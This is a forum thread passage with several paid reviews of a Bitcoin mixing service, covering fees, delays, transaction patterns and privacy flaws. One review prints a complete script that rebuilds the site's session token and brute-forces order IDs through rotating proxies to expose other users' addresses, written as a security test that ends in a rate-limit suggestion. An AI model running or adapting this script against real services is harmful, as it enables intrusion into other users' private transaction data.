https://[banned mixer]/order#xxxxx
you're sent to
https://[banned mixer]/fr/
Tried to break something else with this over browsers but I never managed.

The test themselves

Going to the mixing itself - Basic

  • - good that you made it idiot-proof so that I can't start the mixing after pasting the same address in the fields!
  • - nice touch on the sliders, although I think it's a bit of over exaggeration on the tiny amounts, but a plus+1 for not allowing me no matter how much I've tried to do a 50/50
  • - not sure how the estimator works on the obfuscation but I don't think it should give a good score to a tx such as this

  • -order of guarantee downloaded fast, has all the info, personal opinion the to the minute thing is cheesy overkill but it works.


* I understand people want coins as fast as possible but exactly 0 and 72 hours should in my opinion not be selectable, same for splitting, if we're mixing things don't allow the option to have the funds getting returned at the same time, kind of defeats the purpose.
* the fees estimator is a plus for actually telling what happens if somebody decides to use 5 addresses and still send 0.001 which would cover just the extra address cost, but again, this is a personal opinion but I would simply not allow someone to mix this: 0.00156447 BTC to have that split over 5 address and receive 0.00053602 it makes no economical sense.
I know the value of $1 is different across the world and privacy has no price but this is just wasteful, you're not making too much out of it since you do overpay a lot and if the fees go back to 50sat and you still pay 3x, we know the end result here, right?

Now fast forward, sending the coins, and waiting for the timers all was fine, again impressed that indeed the tx were broadcasted on the minute as I was watching those to see if it's really automatic and not again a single operator giving the go-ahead.

Issues with the mixing
  • Checking the first tx I was so glad they overpaid 3x times, I looked at the topic, so what the first two members had to say and...I knew it. It had to be, I knew it was coming! The other tx had the exact fee, weight, virtual size!
    And the same happened for the next mxiing and half of the current mixing.

  • Another problem is that it overpaid by a lot, I'm somewhat of a mempool overserver myself and I know how estimators can get it wrong and why, so my first test was on Tuesday block 809433 took 30 minutes and raised the fees, 809423 somebody dumped a shitload of tx and the minimum went from 7 to 25 sat/b, I understand that estimators can get it wrong and you have to be fast and not get any tx stuck but those just stick out.

I don't know what others that are mixing through the day are getting seeing 39.7 39.2 and 39.5 in each mixing I assume every tx sent at a certain time gets the same fee. You need a randomizer here, if I'm totally unlucky I can end with 10 addresses funded with the exact fee which is unique by itself in 24 hours among thousands of others.  Your average Joe won't be able to tell the tx apart, but this will be broken in seconds by large tracking companies that have the resources to track tons of data.

  • The mixing itself for the basic is really basic, my coins were just moved two steps, and it uses the same pattern, combined this with the same fee pattern it makes tracking as I said previously extremely easy. Again,  I understand economics, I know that fees would much a lot in the process and that tumbling 10 times some coins for each address deposit would make you lose money on an under 0.05 order but the results are a bit bad.

One thing I do appreciate is linking for a review to bitcointalk after the order is completed, nice touch here.

The second mixing - Standard
Pointing out the differences

  • I was going to use a very low fee and just see what happens when the order is not completed in time but then I saw the other issues and just decided to bump the fee, as expected, it considered it a second deposit. This shows that you need to take a better at look at the fees and mempool mechanics, there are situations when even paying the next block fee might not be enough, some exchanges dumping a shitload of tx might make you miss the time and thus you RBF, this should not be an issue it will only overwhelm your support with things that can be avoided.
  • The mixing results themselves, intermediate is let's say just one step further than basic, the source funds seem to be a bit deeper but it's a matter of steps as I can see the link to my previous coins there. My feeling right now is that you either have a limited pool or you don't want to release too much of your "clean coins"  in it and use a too high percentage of the current deposits. From my limited experience till now, I wouldn't pay for intermediate for anything other than trying to do some casino depositing or something.

The pros
- relatively simple to use, if you're trying to mix coins and you already have enough experience you're not going to get stuck there
- normal fees, let's say it's the median across services
- the calculator is pretty convenient
- the timer and the address funds splitting work as described, features that are a must-have
- the funds arrive on time,

The not completely con, the little ones that can overlooked
- a bit inconvenient to recreate the order page, but a good thing to put it in the letter
- the language changing reset
- the ToS but I think that's just basic material you put it there to have something, not that you're enforcing otherwise it will be top worst thing

The real cons
- the exact fees for each tx, need some finetuning
- basic and intermediate are just moving coins around I would say they are both indeed basic
- issues with replaced transactions, needs to be fixed

Things I'm not sure of how they work and might be a negative too:

I'm a bit concerned about those tumblers codes, how does it track the amount mixed?
I understand if it's a fee reduction coupon as it would just need that code on the current transaction and so, but how is your system able to know how much was mixed based on that, it simply means you're tracking and storing the amounts made with a coupon. Second, what prevents me from telling all my friends and inner circle the code and abusing the system?

.
.BLACKJACK ♠ FUN.
█████████
██████████████
████████████
█████████████████
████████████████▄▄
░█████████████▀░▀▀
██████████████████
░██████████████
████████████████
░██████████████
████████████
███████████████░██
██████████
CRYPTO CASINO &
SPORTS BETTING
▄▄███████▄▄
▄███████████████▄
███████████████████
█████████████████████
███████████████████████
█████████████████████████
█████████████████████████
█████████████████████████
███████████████████████
█████████████████████
███████████████████
▀███████████████▀
█████████
.
TryNinja
Legendary
*
Offline Offline

Activity: 2828
Merit: 6977



View Profile WWW
September 28, 2023, 09:31:09 AM
Last edit: September 30, 2023, 04:41:57 PM by TryNinja
Merited by AHOYBRAUSE (1)
 #108

Bitcointalk username: TryNinja

Always fun testing mixers. Smiley

Website

The website is clean, a typical modern website.

"Many positive customer reviews on forums speak about [banned mixer]'s reliability and solid reputation." -> maybe link some of them, otherwise it doesn't matter what you say. I personally would trust you *less* if I came to the website today and saw this, because it means you probably only wrote it to appear more legit (you don't have the solid reputation yet).

I like that you're mentioning Bitcointalk on your FAQ because it probably means you value this community. If you do something wrong, there is a higher chance you'll listen and do the right thing.

The clearnet website is using DDoS-Guard, far from great but I guess this became a bit of the norm since mixers keep getting DDoS'ed... what about warning people about the risk of using a third party proxy middleman and maybe recommend users to use the Tor mirror?

A question about the tumbler code: How do you keep track of which coins are related to that user? For example, I send from my address X to your mixer address A. Then I come back later and mix again with my code. How do I *NOT* get the coins from mixer address A? If you're saving that information on your database, isn't this a privacy issue?



The mixing

I went to the mixing page and inserted two addresses, one to receive 24.18% with a delay of 7h 9min and the other to receive 75.82% with a delay of 1h 13min, selected a cheap service fee of 0.42% (basic security).

I like the "anonymizing meter" but I feel like its guidelines should be inserted directly in the page (rather than on the hovered icon). Also, there should be more suggestions when the meter is low. For example, if I insert one address, select the minimum fee of 0.40% and a delay of 0h 0min, I see:

Quote
"X Input at least two receiving addresses or more"
"X Do not leave the Fee slider at the minimum value"
"X Do not choose the minimum delay"

"Check out the Blog section for more information [...]"
By putting it on the body, you can link the blog post directly on the message and even make every item suggestion clickable with an anchor directly with the explanation to why that is so good on a blog post.

I downloaded the Letter of Guarantee and verified it correctly with Electrum.

0.0002 BTC fee per address seems a bit too much, no? Every extra address weights around 34 bytes, at 100 sat/vbyte that's less than $1. Even if you say that an extra address with a different delay implies an extra transaction and thus an extra fee, that's tipically less than $2 per tx (1 input, 2 outputs w/ change) on 40 sat/vbyte. It's only fair if fees are at 100 sat/vbyte and beyond.

Before the delay time has passed, I tried mixing once more. I purposely chose a time that would match with one of the address of my first mix so I could compare both transactions. This time I selected a fee of 1.81% (Standard).

Quote

Quote

First one was sent at 13:48, the second one was sent at 13:41 - a difference of 7 minutes.

- Both used the exact same fee, 6501 satoshis (38,9 sat/vbyte).
- Both fees were OVERPAID by 2x (16 sat/vbyte has high priority at the time).
- Both came from a 0,001 BTC input (not the same, though).
- My mixed coins from Mix 1 came DIRECTLY from the address I deposited the coins to on Mix 2. Of course using the mixing code from the previous order probably fixes that, and I also used the cheapest fee option, but still... it doesn't look great. I believe coins should move around a little bit more before they are sent straight to a new customer.
- The last (third) output, with a delay of 7h 9min (far away from the others), was sent with a fee of 6532 (39.8 sat/vB), a bit more and still overpaid.
- All transactions had their change address identified by Blockchair, maybe because a 3-type address sent to a 1-type address and the change was also a 3-type address? What about mixing address types on your backend (deposit address that start with 1, 3, bc1; and outputs also sent from addresses that start with 1, 3, bc1).

Quote
-----BEGIN LETTER OF GUARANTEE-----
Signed message: We hereby confirm that [banned mixer] has generated the address 37DfhXfSYMNE9c7exVmJRVZJvUp22m7Fde in order to transfer incoming amount (minus fee) to the following addresses: 100% to 19MiffThdEWGZaEwDdWVMrQGHPCngH4qcW after 81 min. This service will be only available for all bitcoins received from 2023 September 26, 15:16:12 UTC to 2023 September 27, 15:16:12 UTC with minimum amount of 0.001 BTC per single transaction and maximum amount of 10 BTC total. Our fee is 1.81% + 0.0002 BTC for every target address. This letter is digitally signed by our main account: 1TUMBLRXHDjFZacmFLbuDn2Rw1rcPgacR. Order ID: GZKSHY91-1D9JKO. Stay protected and thank you for using our service.
Bitcoin address: 1TUMBLRXHDjFZacmFLbuDn2Rw1rcPgacR
Signature: GyCzCfcBwYt65dU08EZORjzDUbApn+bCTOqgvl5BO3kNN8Uv2q4IkqV2gyKNCHpXTsmq1o2m4TWy23OzAnr+XTg=
-----END LETTER OF GUARANTEE-----



After the 24h was completed, I checked my order again and it was sucessfully deleted. The API confirmed it:



For a third mix, I tried sending coins and then cancelling my tx though RBF. It was detected after some time and a message showed up: "An error occurred during order processing. Please "contact support (what if I resend it? Nothing showed up, so I cancelled it again).

I didn't check any of the mixed coins for their compliance (AML) risk, but since the mixer is new, probably still unmarked, and one of my coins came directly from another customer (which was also me in this case), it's probably as low as a typical blockchain user that takes crypto payments OR even even as high as a darknet market vendor if you're unluck and you receive those coins directly from his deposit address. In this case it would go in the low risk cattegory.



Hacking attempt...

I wanted to try something different, so after noticing that there was no captcha required on the order page, I wrote a script that brute forces sessions as an attempt to find someone else’s randomly. Assuming a order id format "XXXXXXXX-XXXXXX" and 36 characters (A-Z/0-9), there was 36^14 possible ids. Maybe too much? Still, I wanted to try. Grin

First thing was reverse engineering the obfuscated source code of the website to find out how the page session called fud is generated. After a few hours I managed to do it. Then I got some paid proxies to make the job easier (around 100).

This is the code I used:

Code:
import { crypto } from "https://deno.land/std@0.202.0/crypto/mod.ts";

let proxyNum = 1
let hasFound = false

const proxies = await Deno.readTextFile("./proxies.txt")
    .then(proxies => proxies.split('\n')
        .map(proxie => {
            const [, ip, port,, username, password] = proxie.match(/(\d+\.\d+\.\d+\.\d+):(\d+)(:(.*):(.*))?/) ?? []
            return { ip, port: Number(port), username, password }
        })
    )


function generateRandomString() {
    const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    let result = '';
  
    for (let i = 0; i < 8; i++) {
      result += characters.charAt(Math.floor(Math.random() * characters.length));
    }
  
    result += '-';
  
    for (let i = 0; i < 6; i++) {
      result += characters.charAt(Math.floor(Math.random() * characters.length));
    }
  
    return result;
  }

function arrayBufferToHex(buffer: ArrayBuffer) {
    const hexBytes = [];
    const view = new DataView(buffer);
    for (let i = 0; i < view.byteLength; i++) {
      const byte = view.getUint8(i);
      hexBytes.push(byte.toString(16).padStart(2, "0"));
    }
    return hexBytes.join("");
  }

function md5(value: string) {
   return arrayBufferToHex(crypto.subtle.digestSync('MD5', new TextEncoder().encode(value)))
}

function getProxyClient() {
    const { ip, port, username, password } = proxies[proxyNum - 1]

    proxyNum += 1;

    if (proxyNum === proxies.length) {
        proxyNum = 1
    }

    return Deno.createHttpClient({
        proxy: {
            url: `socks5://${ip}:${port}`,
            basicAuth: {
                username,
                password
            }
        }
    })
}

async function request() {
    const start = 2000000000
    const end = 9999999999
    const rand1 = (Math.floor(Math.random() * (end - start + 1)) + start)
    const rand2 = parseInt(new Date().getTime().toString().substring(0, 10));
    const fud = '' + rand1 + (rand1 - rand2) + md5(rand2 + 'hide').substring(0, 5);
    
    const baseUrl = 'https://[banned mixer]/api/order'
    const orderId = generateRandomString()
    
    const client = getProxyClient()
    const form = new URLSearchParams({ order_id: orderId})
    
    const response = await fetch(`${baseUrl}?fud=${fud}`, {
        method: 'POST',
        headers: { 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8' },
        body: form,
        client
    })
    
    try {
        const json = await response.json()
        return { result: json, orderId }
    } catch (error) {
        throw new Error(error)
    }
}

const luck = async () => {
    try {
        const { result, orderId } = await request()
    
        if (result.error) {
            console.log(`Error: ${result.error} [${orderId}]`)
        } else {
            console.log('----------')
            console.log(`Order Id: ${orderId}`)
            console.log(`Deposit Address: ${result.result.address}`)
            console.log(`Outgoing Addresses: ${result.result.data.form_addresses.map((address: string) => address).join(', ')}`)
            console.log('----------')

            console.log(result)

            hasFound = true
        }
    } catch (error) {
        console.log(error)
    }
}


while (!hasFound) {
    const attempts = Array.from({ length: 25 }, () => luck());
    await Promise.allSettled(attempts)
    await new Promise(resolve => setTimeout(resolve, 250))
}



After running it for some time, I couldn't find a single session and my proxies started to get blacklisted. No luck!

Still, I managed to brute force check a few thousands of possible order ids. My suggestion: Don't let a single IP check 10k sessions, rate limit it after 10 sessions or so... A legit user won't need more than that and, if you're too lenient, a chain-analysis company can easily get 10k IPs and check as many orders as they can (Will they? I don't know).



I also tried intercepting the requests and playing around with the params before they are sent.

Modifying the address to a invalid one returns: "Invalid param form_addresses[]"
Modifying the form_fee to a invalid one (i.e 0.05) returns: "Invalid param form_fee"

No tricky playing around allowed since everything is checked on the backend, nice. Cheesy



Other stuff

- Even before the transaction confirms, the API already returns a deleted_at field with the unix time of 24h in the future. What happens if the transaction takes longer than that to confirm? Is the order deleted anyways? If that's the case, maybe only start the timer after the tx is confirmed? edit: The order which deposit tx I cancelled with RBF is still up, so I guess it isn't deleted UNTIL everything gets cleared.

- Following the last question, what happens if my tx is dropped from the mempool, the order is deleted, and then my wallet automatically rebroadcasts it? I guess the Letter of Guarantee is enough to prove that I sent my coins to address X and didn't receive my coins to address Y (output), right?

- You're new, of course, but put an avatar and card on your twitter account so you don't look inactive and careless (Grin): https://twitter.com/tumbler_io

- Extra suggestion: let people deposit multiple times before they receive their coins. For example, I can send 0.001 BTC from my address A to your deposit address X + send 0.003 BTC from my address B to your deposit address Y. My output will be 0.001 + 0.003 = 0.004 BTC. This makes it so the output can also be higher than a single input transaction (A alone, or B alone).

.
.HUGE.
▄██████████▄▄
▄█████████████████▄
▄█████████████████████▄
▄███████████████████████▄
▄█████████████████████████▄
███████▌██▌▐██▐██▐████▄███
████▐██▐████▌██▌██▌██▌██
█████▀███▀███▀▐██▐██▐█████

▀█████████████████████████▀

▀███████████████████████▀

▀█████████████████████▀

▀█████████████████▀

▀██████████▀▀
█▀▀▀▀











█▄▄▄▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
.
CASINSPORTSBOOK
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀▀█











▄▄▄▄█
AB de Royse777 (OP)
Legendary
*
Offline Offline

Activity: 2478
Merit: 3893


Hire Bitcointalk Camp. Manager @ r7promotions.com


View Profile WWW
September 29, 2023, 05:42:30 AM
 #109

A remainder to the following users as the deadline is going to end tomorrow for Group-1

Code:
examplens
Trofo
bitmover
Bitcoin_Arena

Cheers,


..Stake.com..   ▄████████████████████████████████████▄
   ██ ▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄ ██  ▄████▄
   ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██  ██████
   ██ ██████████ ██      ██ ██████████ ██   ▀██▀
   ██ ██      ██ ██████  ██ ██      ██ ██    ██
   ██ ██████  ██ █████  ███ ██████  ██ ████▄ ██
   ██ █████  ███ ████  ████ █████  ███ ████████
   ██ ████  ████ ██████████ ████  ████ ████▀
   ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██
   ██            ▀▀▀▀▀▀▀▀▀▀            ██ 
   ▀█████████▀ ▄████████████▄ ▀█████████▀
  ▄▄▄▄▄▄▄▄▄▄▄▄███  ██  ██  ███▄▄▄▄▄▄▄▄▄▄▄▄
 ██████████████████████████████████████████
▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄
█  ▄▀▄             █▀▀█▀▄▄
█  █▀█             █  ▐  ▐▌
█       ▄██▄       █  ▌  █
█     ▄██████▄     █  ▌ ▐▌
█    ██████████    █ ▐  █
█   ▐██████████▌   █ ▐ ▐▌
█    ▀▀██████▀▀    █ ▌ █
█     ▄▄▄██▄▄▄     █ ▌▐▌
█                  █▐ █
█                  █▐▐▌
█                  █▐█
▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█
▄▄█████████▄▄
▄██▀▀▀▀█████▀▀▀▀██▄
▄█▀       ▐█▌       ▀█▄
██         ▐█▌         ██
████▄     ▄█████▄     ▄████
████████▄███████████▄████████
███▀    █████████████    ▀███
██       ███████████       ██
▀█▄       █████████       ▄█▀
▀█▄    ▄██▀▀▀▀▀▀▀██▄  ▄▄▄█▀
▀███████         ███████▀
▀█████▄       ▄█████▀
▀▀▀███▄▄▄███▀▀▀
..PLAY NOW..
Gladitorcomeback
Hero Member
*****
Offline Offline

Activity: 658
Merit: 593


#SWGT CERTIK Audited


View Profile WWW
September 29, 2023, 05:47:28 AM
 #110

Review [banned mixer]

Username: Gladitorcomeback

Whenever we choose best Bitcoin mixer we will first look how strong the anonymity feature of each mixure. Strongest the anonymity, privacy will more secure and as a result better will be this mixer. Besides Anonymity Fee, Mixing time, logs policy, verification process, customer support, track record , security and interface should also be check which will define how good one mixer is. In this review I will check all these feature of Tumbler mixer.

It is said in Arabic that "تعرف الاشیاء باضدادھا" which English meaning is " You know things by their competitors" so I will also compete all features with other competitor mixer so it will be easy for us to know that pros and cons. So I chose 2 other mixers Sinbad and Unijoin  from 2023 List Bitcoin Mixers Bitcoin Tumblers Websites . I don't just trust what they claim in their website but checked by mixing btc in all three mixers. I know I have to pay more fee when using all three mixers but I want a better results to satisfy myself to provide best review.

Remember that when I review, I will choose only best mixer to compete with [banned mixer] and also will use other mixer instead of mentioning name of other mixer. For example the fee of Sinbad is 0.5%  and Unijoin 2% then I will say that other mixers charge 0.5%


Opening website:
I opened all three websites at one time in chrome browser, [banned mixer] opened instantly without any verification while sinbad and Unijoin prompted for connection secure bot. I repeated this action again and this All mixer sites opened without promt but speed of [banned mixer] is fastest than all. Then I checked 3 other sites in the list but all have some kind of problem. some say that not available in your region, Mixy was declared malware attack so I can say confirmed that [banned mixer] site loading page is faster than any other mixer site.

Tor browser:
[banned mixer] is opened quickly like chrome. I didn't face any page opening issue single time.

Mobile:
I checked the site in the mobile browser to check how much it is mobile friendly and result is better then my expectations. Actually i am saying this because I checked some other mixers sites I doesn't want to mention here which result was very poor

Some Information before mixing:
Before Going to mix Its necessary to check what feature any mixers provide. We will check Delay time,Fee, Address support, customer support

Delay:
Tumbler: O hr-72 hr
Adjusting time= by minutes
Unijoin: 2 hour -72 hours
Adjusting time= by minutes
Sinbad: O h - 168 hours.
Adjusting time= by hours

Review: Satisfied with minimum hours but
 Maximum hour range is not competent with some mixers. It should be at least 168 hours which Sinbad is already providing.
Adjusting tome is quite best as Tumbler provide minute change option which is best for making transaction more anonymous. Other mixer provide also minutes and some mixers just provide change in hours.

Fee:
Mixer| [banned mixer]| Unijoin | Sinbad |
Fee| 0.4%-5%| 1%-3%|0.5%-2.5%|

Review: In the whole mixer list [banned mixer] is only mixer which starting fee is cheap as 0.4%. The best choice for users who are looking for a cheap mixer. Maximum fee is 5% which is higher than many mixers but it depends upon the user's choice how much one wants to adjust it according to security.

Address supported:
Mixer| [banned mixer]| Unijoin | Sinbad |
Address support | legacy(P2PKH), P2SH, Segwit| legacy(P2PKH), P2SH, Segwit,Taproot|legacy(P2PKH), P2SH, Segwit,Taproot|

Review: In term of address supported, [banned mixer] is not good competent to other mixers as other mixers supported almost all btc address while [banned mixer] still not supporting taproot. [banned mixer] should support all services so that maximum users are able to use them.

Faq:
Faq has almost all necessary questions which one user needs before mixing in any mixers so this is ok from my side.

Logs history :

Mixer| [banned mixer]| Unijoin | Sinbad |
Transaction Log History delete after| 24 hours| Not Keeping |Not Keeping|
Support History delete after| 48 hours| Not Keeping |Not Keeping|
Review:
A good mixer/tumbler didn't keep any type of history for long time to secure whole process. [banned mixer] keeping transaction history for 24 hours support history for 48 hours which is not good where as other competitors/mixers not keeping any log. The good thing is that we can delete this history anytime we want but automatic delete should ne reduce to atleast 24 hours.


Customer support:
Mixer| [banned mixer]| Unijoin | Sinbad |
Customer Support | Got reply in 10 minute| waited for long time| In 2 minutes|

Review: [banned mixer] customer support is not good enough while some other mixers have very fast support services which also provide telegram support , fast enough and available 24/7.


Mixing Process:
I used both all three mixers to check anonymity, fee, speed and other features. so below are my results.

Security level: Basic, Service
fee:  1%
Delay:  03:33
Browser: chrome (window 10)
My address type: bech32 segwit

Mixer| [banned mixer]| Unijoin | Sinbad |
Tracking Transaction | Instant | 1 confirmation |1 confirmation|
Transaction process |1 Confirmation|2 confirmation |After 3 confirmation|

Review:

Speed:
[banned mixer] track my btc instantly in just 1 minute after sending btc which I think is much faster than other mixers. I used Unijoin and Sinbad at the same time but both mixers track after one confirmation.
  Moreover Tumbler needed only 1 confirmation for payment process. By using all three mixers I found that [banned mixer] is fastest one to track and process fund.

The whole transaction process went smoothly and I got no error. I received the exact fund in my wallet at the exact time that I adjusted(3 hr 32 minutes).

User Fee:


 Although [banned mixer] offers 0.4% service fee which is lower than other competitors but every wallet fee is 0.0002btc which is costly while some mixers like Unijoin only charge basic fees.  I mix 0.0015$ using basic service and receive 0.00128500 BTC while in Unijoin i mixed 0.0012 btc and recieved 0.00114560BTC so in term of overall fee [banned mixer] not good competitor. Above picture is payment recieved history when I mixed 0.0012btc with excellent and one can see the fee difference clearly.

Mixer paying fee:

 As I already said that transaction speed of [banned mixer] is very fast but they waste lot of fee on each transaction. In above image you can see clearly that Tumbler wasting more than 4x fee from Unijoin which is not needed. It will be better to use the normal fee(at that time 36 Sat=1.34$) and reduce the per wallet fee which is extra burden on users.

Security level: Good
Service fee:2%
Delay: 0 Minutes
Browser: chrome (Android)
My address type: Base58 (P2SH)

I used Base58 (P2SH) this time without using mixing code and mixed 0.0012btc. The same as the above transaction tracked instantly and received my payment instantly after one confirmation. This time I used only [banned mixer]

Anonymity:
I checked out full history of linked address and happy to say that it doesn't linked with my previous address. Now I am totally satisfied that If I used a good level service my Bitcoin privacy will be secure but one thing is that these addresses received btc from Segwit bech32 address and I don't know If the fund in the address I received was mixers own stock or was user fund recently sent for review. Anyway I will suggest keeping funds at more than 50 addresses so that anonymity (main purpose of Mixer) becomes stronger.

Security level: Excellent
Service fee:4%
Delay: 3 hours 45 minutes .
Browser: Tor (Android)
My address type: Legacy


This time I used legacy(P2PKH) address and used all three mixers. The results appeared this time is more better and I recieved btc from address. I checked the address which is long chained with other addresses but none of any of my previous addresses linked and This time Noted that address have big fund than previous ones. I am completely satisfied with the speed and anonymity but will suggest bech32 which has stronger anonymity than Base58 (P2SH) as i checked in other ms mixers which have a long list of addresses chain to address from which I received btc.

Over conclusion:
I concluded result of [banned mixer] review with other mixers in one table. I will categorized review in poor, average, good, best and excellent. If any feature is better than all other mixers I gives excellent, If other also has but I am fully satisfied then I gives wrote good. If any feature is good but lower than other than good and If any feature is very lower than other mixers than I gives poor review .



Pros:
▪️Tracking funds are very fast
▪️ Only one confirmation for fund to release
▪️ Fully anonymous
▪️ Minimum Service fee is very low
▪️ Website page opening speec is fast then other mixers
▪️ Fully mobile friendly with automatic refreshing when need update
▪️ Interface is so easy to understand
▪️FAQ us well organized
▪️Best compatible with Tor browser

Cons:
▪️Only using 3 address which is easy to track which mixers used
▪️ Over all fee is much high
▪️ Support service is not so good as sometimes I have to wait long for reply
▪️ Support chat history remain for 48 hours which is not good for mixers
▪️ Taproot address not supported yet
▪️ Sending btc after 24 would be considered loan, why not refund?
▪️No captcha at the start which could lead to DDOS attack

Suggestions:
▪️Using only type address is not good so i suggest to use different types of address for both deposit and withdraw. It will increase the anonymity.
▪️Try to hire some user for support chat for fast reply and if possible add telegram support also.
▪️Fee/address is bit high and it should be completely removed or decrease otherwise  people like me will never look for this mixer.
▪️Add strong protection to the site to save it from any malware/DDOS attack because when thia mixer become competent with other than these attack will smbe surrounded.
▪️ [banned mixer] spending high fee than normal which is just extra money wasting so try to keep it normal.

Note: [banned mixer] is improving their system so I can update if any further changes i noticed.

Trofo
Legendary
*
Online Online

Activity: 2478
Merit: 2532


Join the world-leading crypto sportsbook NOW!


View Profile
September 29, 2023, 06:02:59 AM
 #111

A remainder to the following users as the deadline is going to end tomorrow for Group-1
I was super busy whole week and plan was to do most of it on Saturday from them moment I have seen deadlines. Did not see the exact hour of the deadline so I assumed it is Saturday end of day forum time.

It will be up by then for sure. Hope that is ok.

█████████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████
█████████████████████████
.
BC.GAME
▄▄░░░▄▀▀▄████████
▄▄▄
██████████████
█████░░▄▄▄▄████████
▄▄▄▄▄▄▄▄▄██▄██████▄▄▄▄████
▄███▄█▄▄██████████▄████▄████
███████████████████████████▀███
▀████▄██▄██▄░░░░▄████████████
▀▀▀█████▄▄▄███████████▀██
███████████████████▀██
███████████████████▄██
▄███████████████████▄██
█████████████████████▀██
██████████████████████▄
.
..CASINO....SPORTS....RACING..
█░░░░░░█░░░░░░█
▀███▀░░▀███▀░░▀███▀
▀░▀░░░░▀░▀░░░░▀░▀
░░░░░░░░░░░░
▀██████████
░░░░░███░░░░
░░█░░░███▄█░░░
░░██▌░░███░▀░░██▌
░█░██░░███░░░█░██
░█▀▀▀█▌░███░░█▀▀▀█▌
▄█▄░░░██▄███▄█▄░░▄██▄
▄███▄
░░░░▀██▄▀


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
AB de Royse777 (OP)
Legendary
*
Offline Offline

Activity: 2478
Merit: 3893


Hire Bitcointalk Camp. Manager @ r7promotions.com


View Profile WWW
September 29, 2023, 06:17:05 AM
 #112

A remainder to the following users as the deadline is going to end tomorrow for Group-1
I was super busy whole week and plan was to do most of it on Saturday from them moment I have seen deadlines. Did not see the exact hour of the deadline so I assumed it is Saturday end of day forum time.

It will be up by then for sure. Hope that is ok.
All good. It's Saturday the 30th, until 23:59 UTC time :-D

..Stake.com..   ▄████████████████████████████████████▄
   ██ ▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄ ██  ▄████▄
   ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██  ██████
   ██ ██████████ ██      ██ ██████████ ██   ▀██▀
   ██ ██      ██ ██████  ██ ██      ██ ██    ██
   ██ ██████  ██ █████  ███ ██████  ██ ████▄ ██
   ██ █████  ███ ████  ████ █████  ███ ████████
   ██ ████  ████ ██████████ ████  ████ ████▀
   ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██
   ██            ▀▀▀▀▀▀▀▀▀▀            ██ 
   ▀█████████▀ ▄████████████▄ ▀█████████▀
  ▄▄▄▄▄▄▄▄▄▄▄▄███  ██  ██  ███▄▄▄▄▄▄▄▄▄▄▄▄
 ██████████████████████████████████████████
▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄
█  ▄▀▄             █▀▀█▀▄▄
█  █▀█             █  ▐  ▐▌
█       ▄██▄       █  ▌  █
█     ▄██████▄     █  ▌ ▐▌
█    ██████████    █ ▐  █
█   ▐██████████▌   █ ▐ ▐▌
█    ▀▀██████▀▀    █ ▌ █
█     ▄▄▄██▄▄▄     █ ▌▐▌
█                  █▐ █
█                  █▐▐▌
█                  █▐█
▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█
▄▄█████████▄▄
▄██▀▀▀▀█████▀▀▀▀██▄
▄█▀       ▐█▌       ▀█▄
██         ▐█▌         ██
████▄     ▄█████▄     ▄████
████████▄███████████▄████████
███▀    █████████████    ▀███
██       ███████████       ██
▀█▄       █████████       ▄█▀
▀█▄    ▄██▀▀▀▀▀▀▀██▄  ▄▄▄█▀
▀███████         ███████▀
▀█████▄       ▄█████▀
▀▀▀███▄▄▄███▀▀▀
..PLAY NOW..
bitmover
Legendary
*
Online Online

Activity: 2296
Merit: 5921


bitcoindata.science


View Profile WWW
September 29, 2023, 01:38:03 PM
 #113

Tumbler review

About tumbler code:

Personally,  I don't like the idea of a tumbler code. I understand that this is important so that you don't receive your coins back. However, this is a minor problem considering that this can be used to connect different mixing sections.

As you might know, when chipmixer was seized they also got their hard drives with lots of information.  I am curious about what information do you keep associated with Tumbler Code. It could be nice to share what kind of information is stored.

mobile
Firefox Beta Android version 118.0b9
Android version 13

Premium
Two receiving addresses
Delay between 44 and 55 minutes. Fee 3.64%
This combination gave me the maximum anonymity possible according to the website



overall price
I sent a small amount , 0.0011 btc. I received back only 0.00067.

